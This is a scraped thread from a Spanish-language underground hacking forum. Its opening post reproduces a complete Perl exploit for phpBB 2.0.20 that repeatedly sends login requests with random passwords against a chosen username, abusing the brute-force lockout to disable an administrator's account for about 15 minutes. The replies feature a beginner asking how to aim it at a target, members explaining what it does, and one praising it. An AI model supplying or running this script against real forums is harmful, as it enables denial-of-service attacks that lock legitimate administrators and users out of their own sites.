Nuevas NORMAS para el foro

Curso Hacker
Bienvenido(a), Visitante. Favor de ingresar o registrarse.
¿Perdiste tu email de activación? - ſeptiembre 06, 2008, 01:38:11
Boton Buscar
Inicio Ayuda Ingresar Registrarse
Visita: Articulos - Juegos Gratis - Da Foros

Comunidad Underground Hispana  |  Phreaking, Hacking y Seguridad  |  Bug y Exploits (Moderador: OzX)  |  Tema: Send Packet 0 Usuarios y 1 Visitante están viendo este tema. « anterior próximo »
Páginas: [1] Ir Abajo Imprimir
Autor Tema: Send Packet  (Leído 306 veces)
Chivaman
Recien Llegado
*
Desconectado Desconectado

Mensajes: 5


Ver Perfil Email
« en: Diciembre 17, 2006, 11:53:14 »
Código:
###################################################################################
#!/usr/bin/perl
# For PHPBB 2.0.20
# This Exploit Disable Admin Or other User IN PHPBB Forums For 15 Min
# Discover & Writ By : Hossein-Asgari
# http://simorgh-ev.com
# Comment : PHPBB 2.0.18 Secured Bruteforce Cracking Password !
# BUT :
# If anybody Bruteforce TO ADMIN Account --> Admin Account Is Disable .
# Enjoy !
# Advisory : http://www.simorgh-ev.com/advisory/2006/phpbb-disable-admin.pl.txt
###################################################################################
$host=$ARGV[0];
$dirc=$ARGV[1];
$port=$ARGV[2];
$user=$ARGV[3];

$dirsend = "$dirc" . "login.php";
print "
   -------------------------------------
   phpbb-Disable-user.php <Host> </Dir/> <Port> <Admin Username >
   --------------------------------------
   ";
$i=1;
if ($host ne ""){
while($OK ne 1){


use IO::Socket;
my($socket) ="";
   if ($socket = IO::Socket::INET->new(PeerAddr => $host ,
                                       PeerPort => $port ,
                                       Proto    => "TCP"))
{


$password=rand();
$data  = "username="."$user"."&password="."$password"."&redirect=&login=Connexion
";
$length = length $data;
print $socket "POST $dirsend HTTP/1.1
Host: $host
Content-Type: application/x-www-form-urlencoded
Content-Length: $length

$data";
read  $socket, $answer, 15;
close($socket);
}
if($answer =~ /HTTP\/(.*?) 302/){$OK = 1;}
$i=$i+"1";
print "$answer
";
print "Send Packet $i ....
" ;

}}


Hola, ya hice todo eso pero cuando presiono enter (despues de cargar el "xploit.pl" en el CMD me dice "Send packet 1" y asi , me canse de esperar ya hiba en "Send packet 358 545" y cerre el CMD, que pasa con eso, tengo que hacer algo mas??



Saludos


EDIT: Ya hice una busqueda y no encontre nada ni aqui ni en google..   Undecided
« Última modificación: Diciembre 17, 2006, 11:54:45 por Chivaman » En línea
OzX
Moderadores
Gran Colaborador
*****
Desconectado Desconectado

Mensajes: 2067


www.nullbytes.net


Ver Perfil WWW
« Respuesta #1 en: Diciembre 17, 2006, 05:37:33 »
En línea

Para ver los enlaces debes ser usuario Crear Usuario o Hacer Sesion
www.NULLBYTES.Net
Chivaman
Recien Llegado
*
Desconectado Desconectado

Mensajes: 5


Ver Perfil Email
« Respuesta #2 en: Diciembre 17, 2006, 05:44:57 »
En línea
Chivaman
Recien Llegado
*
Desconectado Desconectado

Mensajes: 5


Ver Perfil Email
« Respuesta #3 en: Diciembre 17, 2006, 06:54:41 »
ahora trato de hacer un ataque y me dice:

phpbb-Disable-user.php <la url > </foros/> <80> <administrador> (<-- aqui el nick o el ID?)


EDIT: puse mal los datos?
« Última modificación: Diciembre 17, 2006, 07:02:23 por Chivaman » En línea
OzX
Moderadores
Gran Colaborador
*****
Desconectado Desconectado

Mensajes: 2067


www.nullbytes.net


Ver Perfil WWW
« Respuesta #4 en: Diciembre 17, 2006, 07:14:29 »
sabes lo que es brute forcE? no ejecutes nunca un exploit si no sabes lo que hace.
En línea

Para ver los enlaces debes ser usuario Crear Usuario o Hacer Sesion
www.NULLBYTES.Net
Chivaman
Recien Llegado
*
Desconectado Desconectado

Mensajes: 5


Ver Perfil Email
« Respuesta #5 en: Diciembre 17, 2006, 07:27:49 »
explicame y lo sabre, acabo de empezar en esto!


Perdon si hice algo mal! Tongue
En línea
Litlehorse
Miembro
*****
Desconectado Desconectado

Mensajes: 22


Ver Perfil WWW
« Respuesta #6 en: Diciembre 17, 2006, 07:36:04 »
Citar
#
Para ver los enlaces debes ser usuario Crear Usuario o Hacer Sesion
# Comment : PHPBB 2.0.18 Secured Bruteforce Cracking Password !
# BUT :
# If anybody Bruteforce TO ADMIN Account --> Admin Account Is Disable .


Ese exploit si no me equivoco lo que hace es: Enviar paquetes constantes de intentos de logueo en la cuenta que le indiques y de esta forma por un bug consigue deshabilitar la cuenta de administrador por aproximadamente 10 minutos.
En línea

Para ver los enlaces debes ser usuario Crear Usuario o Hacer Sesion
My blog*
Pr0gr4mer
Colaborador
*****
Desconectado Desconectado

Mensajes: 865


Pr0gr4mer al mango


Ver Perfil WWW
« Respuesta #7 en: Diciembre 18, 2006, 10:23:15 »
Cita de: Chivaman en Diciembre 17, 2006, 07:27:49
explicame y lo sabre, acabo de empezar en esto!


Perdon si hice algo mal! Tongue

 Alli esta el problema! quieres arrancar con una ferrari y ni siquiera sabes manejar una motito a bateria.
 Primero empiesa con la teoria y despues dale a la practica...

 Pr0gr4mer
En línea



 Tu respuesta esta dandole click al
Para ver los enlaces debes ser usuario Crear Usuario o Hacer Sesion
San Buscador


 .::Pr0gr4mer::.
WiNsMuRf
Colaborador
*****
Desconectado Desconectado

Mensajes: 858


Tux Rlz!


Ver Perfil WWW
« Respuesta #8 en: Diciembre 25, 2006, 01:26:29 »
lindo y util exploit

Saludos
En línea





No respondo mensajes privados ni atiendo en el messenger..
Páginas: [1] Ir Arriba Imprimir 
Comunidad Underground Hispana  |  Phreaking, Hacking y Seguridad  |  Bug y Exploits (Moderador: OzX)  |  Tema: Send Packet « anterior próximo »
Ir a:  


Ranking-Hits
Powered by SMF 1.1.5 | SMF © 2006-2007, Simple Machines LLC